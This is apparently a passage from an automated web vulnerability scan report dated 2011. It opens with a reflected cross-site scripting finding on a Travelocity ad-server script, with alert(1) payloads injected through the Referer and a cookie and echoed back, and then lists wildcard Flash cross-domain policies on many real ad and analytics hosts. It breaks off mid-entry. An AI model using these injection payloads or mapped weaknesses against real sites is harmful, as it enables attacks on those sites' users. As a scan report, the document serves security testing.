GET /servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/adserver.js?pubid=c3919e40-e5b8-49f8-b876-4fed1f31968f HTTP/1.1
Host: www.travelocity.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://www.travelocity.com/popWindow2?theDomain=www.travelocity.com&selectedForm=cb-form-ho&formPrefix=HO&fromDate=dd&fromMonth=mm&fromYear=yyyy&toDate=dd&toMonth=mm9d4b7--%3E%3Cscript%3Ealert(1)%3C/script%3Ebbc12be6325&toYear=yyyy&theAdtoShow=ad2&dest=BOS&triptype=&noOfRooms=1&noOfAdults=1&service=TRAVELOCITY&oneway=
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: drft=33637923-4b56-4634-b850-17368e8cd43235267"-alert(1)-"a7305f10e3e; JSESSIONID=CE82F85007B28AF8167D5428864C47CE.p0522; TVLY_GEO=|||||; tyrg1st=51B82D43BB8E25C5; TVLY_LOCALE=us; popunder=yes; cbHistoryPerm=SG90ZWx8fGJvc3x8fFVTOg==; JSID=4D67C14CEA60AD12016D4DCBF7956FF3.p0708; TUID=026a72ef-8262-41a0-8fb0-023b8897eb8d; Service=TRAVELOCITY; SID=T000V00000X111002193730004380323831742; __utma=1.238001331.1317600529.1317600529.1317600529.1; __utmb=1.4.10.1317600529; __utmc=1; __utmz=1.1317600529.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); IPE_S_TMP_910=910; mt.v=1.249362358.1317600494998; drft=33637923-4b56-4634-b850-17368e8cd432; mbox=session#1317600481056-80236#1317605007|PC#1317600481056-80236.19#1318812747|check#true#1317603207

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:52:35 GMT
Server: Apache
Set-Cookie: JSESSIONID=E0293EF4FDC03448F6E9E71AAA07FEC8.p0522; Path=/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0
SERVICE_HOST: 10.8.5.56
P3P: policyref="http://drf-global.com/servicegateway/globaltrips-shopping-svcs/drfadserver-1.0/pub/vfs/pub/drf/p3p/p3p.xml",CP="NOI DSP CURa ADMa DEVa OUR IND UNI COM NAV"
Via: 1.1 (Service Gateway)
Vary: Accept-Encoding
Content-Type: text/javascript;charset=ISO-8859-1
Connection: close
Content-Length: 2429

var DrfGlobals = {
   sid:"33637923-4b56-4634-b850-17368e8cd43235267"-alert(1)-"a7305f10e3e", // session id
   pid:"c3919e40-e5b8-49f8-b876-4fed1f31968f", // publisher id
   pti:"default", // page type id
   src:"none", // source
   ppi:"9c640959-323a-4cfe-96b3-8b0f1864ec3a", // page impression
...[SNIP]...
5. Flash cross-domain policy  previous  next
There are 65 instances of this issue:

Issue background

The Flash cross-domain policy controls whether Flash client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Flash cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.

5.1. http://a.collective-media.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.collective-media.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: a.collective-media.net

Response

HTTP/1.0 200 OK
Server: nginx/0.8.53
Content-Type: text/plain
Content-Length: 187
Last-Modified: Wed, 08 Sep 2010 17:14:24 GMT
Accept-Ranges: bytes
Date: Sun, 02 Oct 2011 23:51:07 GMT
Connection: close
Set-Cookie: JY57=opt_out; expires=Wed, 22-Aug-2001 17:30:00 GMT; domain=.collective-media.net

<?xml version="1.0" ?>
<cross-domain-policy>
<allow-access-from domain="*" secure="false"/>
<allow-http-request-headers-from domain="*" headers="*" secure="true"/>
</cross-domain-policy>
5.2. http://ad-dc2.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-dc2.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad-dc2.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>
5.3. http://ad.doubleclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 258
Last-Modified: Thu, 18 Sep 2003 21:42:14 GMT
Date: Sun, 02 Oct 2011 23:51:36 GMT

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://www.doubleclick.net -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.4. http://ad.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Sun, 02 Oct 2011 23:53:01 GMT
Content-Type: text/xml;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 02 Oct 2011 23:53:00 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
5.5. http://ad4.liverail.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad4.liverail.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.1
Host: ad4.liverail.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: */*
Referer: http://static.eplayer.performgroup.com/ptvFlash/eplayer2/Eplayer.swf
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: lr_uid=17200647; lr_uds=a%3A1%3A%7Bi%3A1001%3Bi%3A1315103266%3B%7D

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:34 GMT
ETag: "3161345513"
Last-Modified: Mon, 26 Sep 2011 21:54:57 GMT
Server: lighttpd/1.4.29-devel-4:6M
Content-Length: 269
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.6. http://ads.pointroll.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:1571"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Sun, 02 Oct 2011 23:49:38 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>
5.7. http://adserver.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://adserver.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: adserver.adtech.de

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: no-cache
Content-Type: text/xml
Content-Length: 111

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>
5.8. http://aka-cdn-ns.adtech.de/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aka-cdn-ns.adtech.de
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aka-cdn-ns.adtech.de

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 04 Apr 2011 13:01:42 GMT
Content-Type: text/xml
Cache-Control: max-age=498855
Expires: Sat, 08 Oct 2011 18:24:12 GMT
Date: Sun, 02 Oct 2011 23:49:57 GMT
Content-Length: 111
Connection: close

<?xml version="1.0" ?><cross-domain-policy><allow-access-from domain="*" secure="true" /></cross-domain-policy>
5.9. http://aperture.displaymarketplace.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://aperture.displaymarketplace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: aperture.displaymarketplace.com

Response

HTTP/1.0 200 OK
Content-Length: 268
Content-Type: text/xml
Content-Location: http://aperture.displaymarketplace.com/crossdomain.xml
Last-Modified: Wed, 06 Jan 2010 19:44:14 GMT
Accept-Ranges: bytes
ETag: "88db83a088fca1:a94"
Server: Microsoft-IIS/6.0
X-Server: D2C.NJ-a.dm.com
P3P: CP="NON DEVo PSAo PSDo CONo OUR BUS UNI"
X-Powered-By: ASP.NET
Expires: Sun, 02 Oct 2011 23:49:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 02 Oct 2011 23:49:39 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
   <site-control perm
...[SNIP]...
5.10. http://b.scorecardresearch.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 07 Jul 2011 18:29:25 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:50:07 GMT
Date: Sun, 02 Oct 2011 23:50:07 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
5.11. http://bcp.crwdcntrl.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: bcp.crwdcntrl.net

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:53:09 GMT
Server: Apache/2.2.8 (CentOS)
Last-Modified: Wed, 21 Sep 2011 13:44:24 GMT
ETag: "1420486-ba-4ad73c624fe00"
Accept-Ranges: bytes
Content-Length: 186
Vary: Accept-Encoding
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only" />
<allow-access-from domain="*" />
</cross-domain-policy>
5.12. http://beacon.securestudies.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://beacon.securestudies.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: beacon.securestudies.com

Response

HTTP/1.0 200 OK
Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT
Content-Type: application/xml
Expires: Mon, 03 Oct 2011 23:52:41 GMT
Date: Sun, 02 Oct 2011 23:52:41 GMT
Content-Length: 201
Connection: close
Cache-Control: private, no-transform, max-age=86400

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
</cross-domain-policy
...[SNIP]...
5.13. http://c.betrad.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://c.betrad.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: c.betrad.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "623d3896f3768c2bad5e01980f958d0a:1298927864"
Last-Modified: Mon, 28 Feb 2011 21:17:44 GMT
Accept-Ranges: bytes
Content-Length: 204
Content-Type: application/xml
Date: Sun, 02 Oct 2011 23:51:36 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-poli
...[SNIP]...
5.14. http://cacheserve.williamhill.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cacheserve.williamhill.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cacheserve.williamhill.com

Response

HTTP/1.1 200 OK
Date: Sun, 25 Sep 2011 15:09:10 GMT
Server: MII-APC/2.1.10
Last-Modified: Tue, 29 Mar 2011 11:40:16 GMT
Content-Type: application/xml
ETag: W/"204-1301398816000"
Age: 636190
Via: 1.1 sjc005158 (MII-APC/2.1)
x-mii-cache-hit: 1, auth=1
Content-Length: 204
Warning: 113 sjc005158 "Heuristic expiration" "Sun, 25 Sep 2011 15:09:10 GMT"
Via: 1.1 sjc005159 (MII-APC/2.1)
Via: 1.1 sjc005161 (MII-APC/2.1)
Expires: Sun, 09 Oct 2011 23:52:20 GMT
Cache-Control: max-age=1240990
X-Pb-Mii: Powered by Mirror Image Internet
Via: 1.1 sjc005106 (MII-APC/2.1)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-pol
...[SNIP]...
5.15. http://cas.criteo.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cas.criteo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cas.criteo.com

Response

HTTP/1.1 200 OK
Server: nginx
Cache-Control: max-age=31104000
Cache-Control: public
Content-Type: text/xml
Date: Sun, 02 Oct 2011 23:49:33 GMT
Expires: Wed, 26 Sep 2012 23:49:33 GMT
Accept-Ranges: bytes
Connection: close
Last-Modified: Wed, 19 Sep 2007 08:50:25 GMT
Content-Length: 360

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="all" />

...[SNIP]...
<allow-access-from domain="*" secure="false" />
...[SNIP]...
5.16. http://cdn.flashtalking.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.flashtalking.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.flashtalking.com

Response

HTTP/1.0 200 OK
x-amz-id-2: x91gS7A+mOoQBJMpsSvpSjs8Kl4JSjw9nBBYAVCZHtBqqxph0+xgdMahmBkl+KZl
x-amz-request-id: DD2B4B27E613A7C4
Last-Modified: Mon, 22 Aug 2011 09:48:30 GMT
ETag: "86f55de532e6feae15623e7a599dfb87"
Content-Type: application/xml
Content-Length: 322
Server: AmazonS3
Date: Sun, 02 Oct 2011 23:53:31 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- Policy file for http://video.flashtalking.com -->
<cross-domain-policy>

...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...
5.17. http://cdn.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.turn.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Pragma: private
Content-Type: text/xml;charset=UTF-8
Cache-Control: private, max-age=0
Expires: Sun, 02 Oct 2011 23:53:04 GMT
Date: Sun, 02 Oct 2011 23:53:04 GMT
Content-Length: 100
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>
5.18. http://d.tradex.openx.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://d.tradex.openx.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: d.tradex.openx.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:52:00 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 00:56:43 GMT
ETag: "88c2d-c7-497e11c2d28c0"
Accept-Ranges: bytes
Content-Length: 199
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>
5.19. http://dev.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dev.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: dev.virtualearth.net

Response

HTTP/1.1 200 OK
Cache-Control: max-age=5443200
Content-Type: text/xml
Last-Modified: Sun, 18 Sep 2011 00:40:53 GMT
Accept-Ranges: bytes
ETag: "63203e9f9b75cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Mon, 03 Oct 2011 01:02:31 GMT
Connection: close
Content-Length: 277

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-r
...[SNIP]...
5.20. http://ecn.t0.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t0.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t0.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 66083
Date: Mon, 03 Oct 2011 01:02:36 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.21. http://ecn.t1.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t1.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t1.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 1
Date: Mon, 03 Oct 2011 01:02:34 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.22. http://ecn.t2.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t2.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t2.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 18986
Date: Mon, 03 Oct 2011 01:02:37 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.23. http://ecn.t3.tiles.virtualearth.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ecn.t3.tiles.virtualearth.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ecn.t3.tiles.virtualearth.net

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "8dd9956cd874cc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 207
Age: 179286
Date: Mon, 03 Oct 2011 01:02:31 GMT
Last-Modified: Sat, 17 Sep 2011 01:23:37 GMT
Connection: close

...<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-
...[SNIP]...
5.24. http://ehg-twi.hitbox.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ehg-twi.hitbox.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ehg-twi.hitbox.com

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:49:17 GMT
Server: Hitbox Gateway 9.3.6-rc1
Connection: close
Cache-Control: max-age=3600, private, proxy-revalidate
Expires: Mon, 03 Oct 2011 00:49:17 GMT
Content-Type: text/xml
Content-Length: 93

<cross-domain-policy>
   <allow-access-from domain="*" secure="false"/>
</cross-domain-policy>
5.25. http://ff.connextra.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ff.connextra.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain, and allows access from specific subdomains.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ff.connextra.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
ETag: W/"185-1316505216000"
Last-Modified: Tue, 20 Sep 2011 07:53:36 GMT
Content-Type: application/xml
Content-Length: 185
Date: Sun, 02 Oct 2011 23:50:54 GMT
Connection: close

<cross-domain-policy>
<allow-access-from domain="ff.connextra.com" />
<allow-access-from domain="dd.connextra.com" />
<allow-access-from domain="*" />
</cross-domain-policy>
5.26. http://hits.guardian.co.uk/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://hits.guardian.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: hits.guardian.co.uk

Response

HTTP/1.1 200 OK
Date: Sun, 02 Oct 2011 23:51:01 GMT
Server: Omniture DC/2.0.0
xserver: www63
Content-Length: 137
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*" />
</cross-domain-policy>
5.27. http://ib.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: ib.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
